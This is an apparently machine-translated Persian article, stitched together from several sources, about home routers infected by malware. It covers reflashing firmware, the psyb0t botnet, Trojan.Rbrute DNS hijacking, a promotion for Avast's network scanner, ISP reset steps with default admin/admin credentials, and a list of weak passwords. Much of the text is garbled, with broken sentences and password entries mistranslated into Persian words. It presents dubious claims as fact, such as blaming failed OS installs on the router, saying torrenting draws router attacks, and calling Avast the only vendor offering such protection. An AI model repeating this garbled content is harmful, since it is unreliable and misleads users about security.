این اتفاق می افتد که یک برنامه ویروسی سیستم عامل روتر را تغییر می دهد. می توانید با فلش کردن نسخه آلوده آن را خنثی کنید.

کامپیوتر خود را از طریق سیم LAN به روتر وصل کنید. باید با هر روتری همراه باشد. اگر نه، پس می توانید استفاده کنید اتصال وای فای. با این حال، اتصال کابلی ترجیح داده می شود.


پس از اتصال به روتر، مرورگر را راه اندازی کنید و مقدار 192.168.1.1 (یا دیگری که در خود دستگاه مشخص شده است) را در قسمت آدرس وارد کنید، سپس برای باز کردن تنظیمات روتر باید رمز عبور را وارد کرده و وارد شوید. نام کاربری و رمز عبور پیش فرض admin است. اگر نمی توانید تنظیمات را وارد کنید، باید جزئیات ورود فعلی را پیدا کنید، شاید پس از آخرین نصب آنها تغییر کرده باشند.

دانلود نسخه جدیدسیستم عامل از وب سایت سازنده و با رفتن به تنظیمات روتر، آن را روی دیسک رایانه انتخاب کنید. فرآیند سیستم عامل برای همه روترها یکسان است.


محافظت از تجهیزات شبکه در برابر ویروس ها

برای محافظت از روتر خود در برابر عفونت، می توانید از توصیه های زیر استفاده کنید:

  • به روز رسانی سیستم عامل را انجام دهید آخرین نسخه. به وب سایت سازنده مراجعه کنید، مدل خود را جستجو کنید و آخرین سیستم عامل را دانلود کنید.
  • یک مقدار رمز عبور چند ارزشی در رابط وب تنظیم کنید. همه روترها به شما اجازه نمی دهند لاگین خود را تغییر دهید. با این حال، اگر یک رمز عبور پیچیده تنظیم کنید، هک کردن رابط وب آسان نخواهد بود.
  • ورود آفلاین را در تنظیمات روتر تنظیم کنید.
  • آدرس IP روتر را در دسترسی محلی تغییر دهید. در طی فرآیند هک، ویروس بلافاصله به آدرس هایی مانند 192.168.0.1 و 192.168.1.1 دسترسی پیدا می کند. بر این اساس بهتر است اکتت سوم و چهارم آدرس IP LAN را تغییر دهید.
  • قابل اعتماد تحویل دهید برنامه آنتی ویروسروی کامپیوتر اگر ابتدا ویروس بخواهد وارد رایانه شود، بلافاصله حذف می شود که از آسیب رساندن به روتر جلوگیری می کند.
  • رمزهای عبور را در مرورگر ذخیره نکنید.


همانطور که می بینید، بررسی روتر برای ویروس ها و تمیز کردن آن آسان است. اما بهتر است دنبال کنید توصیه سادهبرای پیشگیری از عفونت اما اگر این اتفاق بیفتد، می دانید که چه کاری باید انجام دهید.

خوانندگان محترم. برای صرفه جویی در وقت شما. بلافاصله در مورد چیز اصلی. همه موارد زیر به وجود تروجان ها یا ویروس ها در رایانه شما به مدت 5 تا 7 روز کمک می کند. در این مدت، اسکن هایی از اینترنت وجود دارد، اما پس از هک، سکوت مشکوکی رخ می دهد - اسکن وجود ندارد - روتر آلوده دیگر اجازه ورود به رایانه شخصی را نمی دهد، دستورات را می پذیرد و آنها را اجرا می کند. این بر سرعت اینترنت تأثیر می گذارد - سقوط می کند.

اگر روتر شما قبلاً آلوده شده باشد، پس سرقت FTP، ایمیل و سایر رمزهای عبور موضوعی در آینده نزدیک است.

قبلاً در سال 2009 شخصی DroneBL جهان را در مورد اپیدمی (آغاز؟) ویروس هایی که روترها را تحت تأثیر قرار می دهند مطلع کرد. اخبار او پس از حمله به سایت ظاهر شد، مدیران این سایت فاش کردند که این امر اساسی است نوع جدیددر میان حملات Ddos. این حمله توسط روترهای آلوده انجام شد. بنابراین اکنون، "خانواده" رایانه های زامبی دوباره پر شده است - روترهای زامبی. یک شبکه بات نت کشف شد که از روترهای خانگی آلوده تشکیل شده بود! آنها این شبکه را "psyb0t" نامیدند. اینگونه بود که اپیدمی ویروس روتر رسما آغاز شد.

هک با اسکن پورت های روتر و در دست گرفتن کنترل روی آن رخ می دهد. متأسفانه، مقالاتی در اینترنت در مورد اینکه دقیقاً چگونه این یا آن مدل از روتر ساده ترین هک است، در حال افزایش است. اما آنجاست که می توانید یاد بگیرید چگونه از خود در برابر این فاجعه محافظت کنید. پس از کنترل روتر، جاسوسی از محتویات ترافیک عبوری آغاز شد. سرقت رمز عبور پیوستن به فعالیت های مخرب عمومی شبکه بات نت در اینترنت جهانی. اسکن پورت های یک کامپیوتر خانگی، اما در اینجا با جزئیات بیشتری صحبت خواهم کرد. نویسنده توانست این حضور را ردیابی کند اتصال شبکهبه یک روتر هک شده منجر به چنین مشکلاتی می شود. هنگامی که فایروال را مجدداً در سیستم نصب می کنید "از هیچ جا" ویروس ها ظاهر می شوند. هنگامی که سعی می‌کنید دبیان یا اوبونتو را هنگام دانلود به‌روزرسانی‌ها در طول مراحل نصب نصب کنید، این سیستم‌ها به درستی نصب نشدند. برای مثال

  1. راه اندازی Firestarter نصب شده غیرممکن است - عملکرد اداری راه اندازی می شود و تمام. یعنی چیزی با امتیازات مدیریت اجرا می شود، اما چیزی که مشخص نیست. Firestarter فقط شروع نمی شود.
  2. اگر اتصال به اینترنت وجود داشته باشد، Deadbeef شروع نمی شود، هنگامی که روتر خاموش است، بلافاصله روشن می شود.
  3. برخی از برنامه هایی که نیاز به امتیازات ادمین دارند بدون درخواست رمز عبور اجرا می شوند، بقیه اصلا اجرا نمی شوند.
  4. پس از نوشتن این مقاله، این نکات کمتر به چشم می خورد. یعنی مشکلاتی وجود خواهد داشت، اما آنها متفاوت به نظر می رسند.

نصب مجدد در همان رایانه، از همان دیسک نصب، با خاموش شدن روتر، موفقیت آمیز بود. سیستم (تست شده در اوبونتو) مانند ساعت کار می کرد. این تعجب آور نیست، زیرا روترها با سیستم عامللینوکس میپسل البته، آسیبی که از یک روتر زامبی وارد می‌شود «متنوع‌تر» از آن چیزی است که من در اینجا متوجه شدم و توضیح دادم، اما این لحظهثروتمند، این چیزی است که ما به اشتراک می گذاریم ...

ویندوز نصب شده (با روتر آلوده غیرفعال شده) "زنده ماند"، اما Agnitum Outpost Firewall Pro اسکن پورت ها را از همان دقایق اولیه پس از نصب شناسایی کرد. آن ها روتر به پورت(ها) حمله می کند.

برنج. اسکن پورت های من از اینترنت و در نهایت از یک روتر آلوده.

همانطور که در شکل مشاهده می کنید، در تاریخ 2017/04/27 در ساعت 23:51:16، یک اسکن از قبل از روتر زامبی انجام شد. قبل از آن، اسکن هایی از شبکه امنیتی Kaspersky وجود داشت - 130.117.190.207 (دیوار آتش آنها را "پسند" نمی کند، اما این هنجار با نصب Kaspersky است) و مشخص نیست کجاست. و در تاریخ 12/04/27، روتر به تنظیمات کارخانه بازنشانی شد (Huawei HG530). از آن زمان، آنها فقط از شبکه امنیتی Kaspersky - 130.117.190.207 و ARP_UNWANTED_REPLY - می آیند - نویسنده فیلتر ARP را روشن کرده است. بنابراین، تلاش های روتر برای "صحبت" مجدد با رایانه شخصی (این فعالیت عادی روتر است - اما اکنون Agnitum فقط آن پاسخ های ARP را که در پاسخ به درخواست رایانه شخصی من می آید) و همچنین تلاش می کند. توسط برخی افراد برای رهگیری ترافیک با استفاده از پاسخ ARP جعلی توسط فایروال مسدود می شود. اگر کسی ترافیک من را به این طریق رهگیری کند و آن را از طریق رایانه خود عبور دهد، من در نقش یک کارمند دفتر با استفاده از اینترنت خواهم بود، در حالی که مدیر سیستم این شرکت همه اقدامات من را می بیند و گزارش مفصلی برای رئیس تهیه می کند. چند نامه (به چه کسی، در مورد چه چیزی) نوشته شده است، چند نفر در ICQ چت کرده اند. البته رمزهای ایمیل و غیره. آنها هم می توانند دزدی کنند

خط پایین - از لحظه ای که روتر خود را تنظیم مجدد کردم و آنچه را که در زیر توضیح خواهم داد انجام دادم، هیچ حمله ای از اینترنت وجود ندارد. "تفنگچی" حذف شده است، روتر تمیز است و فقط کاری را انجام می دهد که برای آن ایجاد شده است. اما تروجان روی رایانه شخصی نیز باید حذف شود، در غیر این صورت هکرها را از قبل به IP شما هدایت می کند.

کسانی که تجهیزات شبکه می سازند هیچ اقدام حفاظتی ارائه نمی دهند. دستورالعمل روترها حاوی توضیحاتی در مورد نحوه وارد کردن لاگین و رمز عبور برای دسترسی به ارائه دهنده است، اما هیچ کلمه ای وجود ندارد که رمز عبور پیش فرض ادمین را نمی توان در روتر گذاشت! علاوه بر این روترها باید دارای عناصر باشند کنترل از راه دورکه اغلب شامل می شوند. سازندگان نرم افزارهای ضد ویروس ساکت هستند. بی اختیار این سوال پیش می آید که چه کسانی از این کار سود می برند.

راه های عفونت

بهتره یه بار ببینی که برای آن یک انیمیشن GIF با تجزیه و تحلیل شماتیک از موقعیت پیشنهاد می کنم. اگر قابل مشاهده نیست، Adblock یا چیزی شبیه به آن تداخل دارد - آن را در این صفحه خاموش کنید.

دو تا از آنها موجود است. اولین مورد از طریق WAN، با نام مستعار اینترنت است. آن ها هکرها IP شما را پیدا می کنند، به عنوان مثال، زمانی که فایل ها را با استفاده از پروتکل تورنت دانلود یا توزیع می کنید (اطلاعات بیشتر در این مورد در پایان مقاله) و با اسکن IP شما نقاط ضعفی در محافظت از روتر پیدا می کنند. اما کمتر رایج است. نحوه بستن این دروازه ها را در این مقاله بخوانید.

یا یک تروجان در رایانه شخصی ما وجود دارد. و سپس هکرها را به IP پویا (!) ما هدایت می کند. با دانستن این آدرس، آنها قبلاً به طور روشی روتر را "چکش کاری" می کنند. در مورد تروجان ها در راه دوم عفونت خواندیم.

مورد دوم از طریق LAN است، یعنی از رایانه شخصی شما. اگر یک تروجان روی رایانه شخصی شما وجود داشته باشد، هکرها می توانند رمز عبور روتر را مستقیماً از رایانه شخصی شما حدس بزنند. بنابراین، این رمز عبور باید گاهی اوقات تغییر کند. اما در مورد این واقعیت که یک رایانه آلوده سعی می کند روتر را از سمتی هک کند که محافظتی ارائه نمی دهد، چطور؟ ابتدا باید درک کنید که یک روتر تمیز با رایانه شخصی آلوده دوام زیادی نخواهد داشت. فورس معمولی (حدس زدن رمز عبور brute-force) آن را در عرض یک هفته یا حتی سریعتر از بین می برد. بنابراین، اگر مجبور هستید روتر خود را مرتباً تمیز کنید، وقت آن است که به پاکسازی کامل ویروس ها فکر کنید.

و الان لحظه ویروس / تروجان از کجا در رایانه شخصی می آید؟ دلایل و راه حل های اصلی را در پرانتز لیست می کنم. گزینه ها عبارتند از:

1- ویندوز کرک شده اولیه نصب شده است (از دیسک های نصب تمیز استفاده کنید).

2- ویندوز را بعد از نصب غرغر کنید (یا تحمل کنید و ماهانه دوباره نصب کنید یا ویندوز بخرید).

3 - نرم افزار کرک شده (استفاده از برنامه های رایگانیا خرید پولی)؛

4- ویروس در فایل های شخصی شماست (همانطور که در پاکسازی سیستم از ویروس ها توضیح دادم تمامی فایل های شخصی را از طریق پاکسازی اجرا کنید).

5 - سیستم قبلاً در حین استفاده از طریق فلش درایو آلوده شده است ، اینترنت ، جهنم می داند چگونه (محافظت - ما اینترنت را به روشی مطمئن مطالعه می کنیم ، در مورد درایوهای فلش ، در مورد آخرین نکته سکوت خواهم کرد).

به طور جداگانه، متذکر می شوم که با کشف IP روتر، هکرها شروع به اسکن آن می کنند تا به رمز عبور رمزگذاری شده دسترسی پیدا کنند و سپس با استفاده از رمز عبور سرقت شده، کنترل را به دست می گیرند. بنابراین، اگر اکنون نیازی به دسترسی به اینترنت ندارید، روتر را روشن نگذارید.

ولی!!! حتی اگر با استفاده از بارگیری شود ماشین مجازی، شروع به چکش زدن روتر شما می کند. غیرفعال کردن آن و فعال کردن مجدد آن در این فرآیند به اینجا کمک می کند، و مهم ترین چیز پس از دانلود تورنت این است که ارائه دهنده یک IP پویا جدید پس از راه اندازی مجدد روتر صادر می کند و هکرها فقط باید حدس بزنند که آدرس شما در حال حاضر چیست. بر. و روتر شما هم... البته روی توزیع نخواهید ماند - پس از اتمام دانلود باید فورا برنامه دانلودر تورنت را خاموش کنید و بعد از آن روتر را خاموش و روشن کنید.

و به طور کلی

روتر را غیر ضروری روشن نگه ندارید! اجازه ندهید یک بار دیگر هکرهای کوچک وارد ملک خود شوند... فراموش نکنید که هر بار که سرعت اتصال به اینترنت بی دلیل کاهش می یابد، روتر را تمیز کنید. مراقب بودن ضرری نداره...

خوب، همه چیز. حالا می توانید بگیرید دفترچه راهنمای کارخانهبه روتر خود وارد شده و لاگین و رمز عبور صادر شده توسط ارائه دهنده اینترنت را مشخص کنید. این معمولاً در تب تنظیمات WAN انجام می شود. اکنون روتر شما از طریق اینترنت قابل کنترل نیست. حداقل فعلا.

روتر شما یکی از ضعیف ترین لینک ها در امنیت شماست و محققان بار دیگر آن را ثابت کرده اند.

شصت حفره امنیتی در 22 مدل روتر در سرتاسر جهان یافت شد که بیشتر در مدل هایی که ISP ها برای مشتریان خود ارائه می کردند. وجود این آسیب‌پذیری‌ها می‌تواند به هکرها اجازه دهد تا به دستگاه‌ها نفوذ کنند، رمز عبور را تغییر دهند و اسکریپت‌های مخربی را که سرورهای DNS را تغییر می‌دهند، نصب و اجرا کنند. بنابراین، هکرها می توانند شما را به وب سایت های مخرب هدایت کنند یا دانلود کنند کد مخربهنگامی که از صفحات وب رسمی بازدید می کنید، به رایانه خود بروید.

این آسیب‌پذیری‌ها همچنین به هکرها اجازه می‌دهد اطلاعات را روی دستگاه‌های ذخیره‌سازی USB متصل به روتر آسیب‌دیده بخوانند و بنویسند.

این مطالعه توضیح می‌دهد که چگونه مهاجمان می‌توانند به رایانه شخصی دسترسی پیدا کنند - یعنی از طریق یک درب پشتی با رمز عبور جهانی، که توسط پرسنل ارائه‌دهنده فنی برای کمک از راه دور به مشتریان از طریق تلفن استفاده می‌شود. این دسترسی ادمین دوم به طور پیش فرض از صاحب روتر پنهان است.

چه مدل های روتر تست شده اند؟

محققان مدل‌های زیر را آزمایش کردند: Amper Xavi 7968، 7968+ و ASL-26555. آستوریا ARV7510; بلکین F5D7632-4; cLinksys WRT54GL; Comtrend WAP-5813n، CT-5365، AR-5387un و 536+; D-Link DSL-2750B و DIR-600; Huawei HG553 و HG556a; ; Netgear CG3100D; Observa Telecom AW4062، RTA01N، Home Station BHS-RTA و VH4032N؛ Sagem LiveBox Pro 2 SP and Fast 1201 و Zyxel P 660HW-B1A.
از آنجایی که محققان اهل مادرید هستند، تمرکز اصلی تحقیقات آنها روترهایی بود که توسط ارائه دهندگان اینترنت اسپانیایی ارائه می شود، اما Linksys، D-Link و Belkin به طور گسترده در روسیه و سایر کشورها استفاده می شوند.

چگونه می توانید از روتر خود محافظت کنید؟

در همه آنتی ویروس های Avastویژگی داخلی امنیت شبکه خانگی (HNS) که پیکربندی ضعیف را اسکن می کند شبکه های وای فای، ضعیف یا پیش فرض را نشان می دهد رمزهای عبور وای فای، آسیب پذیری در روتر، اتصالات اینترنتی هک شده و پروتکل IPv6 گنجانده شده اما ایمن نیست. این تابعهمچنین لیستی از دستگاه های متصل به شبکه را نشان می دهد که به شما کمک می کند مطمئن شوید که فقط دستگاه هایی که می شناسید به شبکه شما متصل هستند. Avast تنها شرکت در این زمینه است امنیت اطلاعات، که امکان ایمن سازی منطقه را فراهم می کند.

چگونه خود را اسکن کنیم روتر خانگیبا امنیت شبکه خانگی؟

رابط کاربری Avast را باز کنید، روی دکمه Scan از منوی سمت چپ کلیک کنید، سپس Network Threat Scan را انتخاب کنید.
Avast روتر شما را اسکن می کند و گزارشی از تهدیداتی که پیدا می کند ارائه می دهد. در بیشتر موارد، اگر تهدیدی شناسایی شود که به توجه شما نیاز دارد، Avast شما را به وب سایت سازنده روتر هدایت می کند.

برای محافظت از خود در برابر تروجان Trojan.Rbrute که مودم ها / روترهای TP-link را آلوده می کند، باید چندین کار انجام دهید. شرایط ساده. ویروس با اسکن brute-force آدرس های IP در محدوده n ام پخش می شود و پس از آن روش حدس زدن رمز عبور با استفاده از روش brutforce شروع می شود. تقریباً تمام مدل های محبوب مورد حمله قرار می گیرند روترهای Tp-link. تروجان با ورود به تنظیمات دستگاه، آدرس های DNS ارائه دهنده را به آدرس های مهاجمان تغییر می دهد.

روتر شما آلوده است اگر:

هنگام تلاش برای رفتن به هرسایت، چه remont-sro.ru یا سرویس Gmail.com، یک سایت دانلود جعلی باز می شود گوگل کرومیا سایر منابع مشکوک در ابتدا، تغییر مسیر فقط برای درخواست‌های کاربران حاوی کلمات Facebook یا Google کار می‌کرد، اما اکنون تروجان به هر یک از آنها پاسخ می‌دهد. علامت روی مودم ثابت می ماند، "اینترنت" به طور پیوسته روشن می شود، کامپیوتر نشان می دهد که اتصال برقرار شده است، مجوز صادر شده است، اما خود اینترنت کار نمی کند، بلکه فقط به صفحات تبلیغاتی و / یا دانلود جعلی منتقل می شود

مورد 1. تنظیم مجدد. پیکربندی مجدد مودم
این دستورالعمل توسط ماریا کورچاژینا، متخصص TsOO TsOO تهیه شده است

اگر نمی توانید تنظیمات مودم را از طریق 192.168.1.1 وارد کنید، سعی کنید این کار را از طریق آدرس 192.168.42.1 انجام دهید.

این صفحه شامل تنظیمات است فقطبرای سرویس اینترنت برای پیکربندی IP-TV و WI-FI، راهنمای کامل را دانلود کنید

نسخه روسی - http://yadi.sk/d/JC6l6FPVRbU9P

نسخه انگلیسی - http://yadi.sk/d/j6Ly7bA4RbU8r

1. برای تنظیم مجدد تنظیمات روی مودم، دکمه را با سوزن / خمیر / خلال دندان فشار دهید. تنظیم مجدددر یک فرورفتگی کوچک از 5 تا 15 ثانیه نگه دارید تا نشانگر روی دستگاه ناپدید شود. چراغ ها باید همانطور که پس از راه اندازی مجدد معمولی روتر خاموش می شوند خاموش شوند.

2. برای پیکربندی مودم، کابل را به هر پورت LAN وصل کنید، از طریق اتصال Wi-Fi پیکربندی نکنید.

3. از طریق وارد شوید مرورگر اینترنتکاوشگر به رابط روتر، در آدرس: 192.168.1.1. یک کادر محاوره ای باز می شود. در قسمت Username و Password به ترتیب admin/admin را وارد کنید. باز خواهد شد صفحه شروعروتر (به زیر مراجعه کنید)

در این صفحه خواهید دید که کدام تنظیمات از قبل وجود دارد:

4. قبل از شروع به پیکربندی روتر، باید تمام تنظیمات ایجاد شده قبلی را حذف کنید، برای این کار به قسمت بروید. "تنظیمات رابط" -> "اینترنت"، "کانال مجازی" - PVC0 را انتخاب کنید، در پایین صفحه، روی دکمه "حذف" کلیک کنید. ما این کار را با هر کانال مجازی انجام می دهیم (فقط 8 مورد از آنها وجود دارد).

در پایان، این چیزی است که باید اتفاق بیفتد (دوباره به بخش بروید "دولت"):

5. حالا به بخش بروید "راه اندازی رابط"، سپس یک زیربخش را انتخاب کنید "اینترنت"(نگاه کنید به تصویر زیر). پارامترها را مانند تصویر زیر (کاربر و رمز عبور: rtk) مشخص کنید، سپس با کلیک بر روی دکمه "ذخیره" تمام پارامترها را ذخیره کنید.
این کار تنظیمات حالت PPPoE را تکمیل می کند.

مرحله 2. تغییر رمز عبور برای ورود به روتر

برای تغییر رمز عبور به آدرس زیر بروید "عملکرد دستگاه"، سپس "مدیریت"، جایی که رمز عبور برای ورود به روتر در واقع تغییر می کند (یک رمز عبور پیچیده ایجاد کنید) (به تصویر زیر مراجعه کنید). سپس دکمه را فشار دهید "صرفه جویی"

مورد 2.5 لیست رمزهای عبوری که توصیه نمی شود در ورودی روتر تنظیم شوند

111111
12345
123456
12345678
abc123
مدیر
مدیر
کلمه عبور
qwerty
ریشه
tadpassword
trustno1
مصرف كننده
اژدها
gizmodo
اقرقوکسم
لتمین

ویروس از قبل همه این رمزهای عبور را "می داند" و حدس زدن رمز عبور 1 ثانیه طول می کشد. رمز عبور باید نه تنها از اعداد یا حروف تنظیم شود. نویسه های خاص (شبکه، ستاره، درصد، علامت نقل قول) و حروف با حروف مختلف (بزرگ و کوچک) باید وجود داشته باشد. هرچه گذرواژه بزرگتر و متنوع تر باشد، مدت زمان بیشتری طول می کشد تا آن را "بی رحم" کنید (اگر اصلا وجود داشته باشد).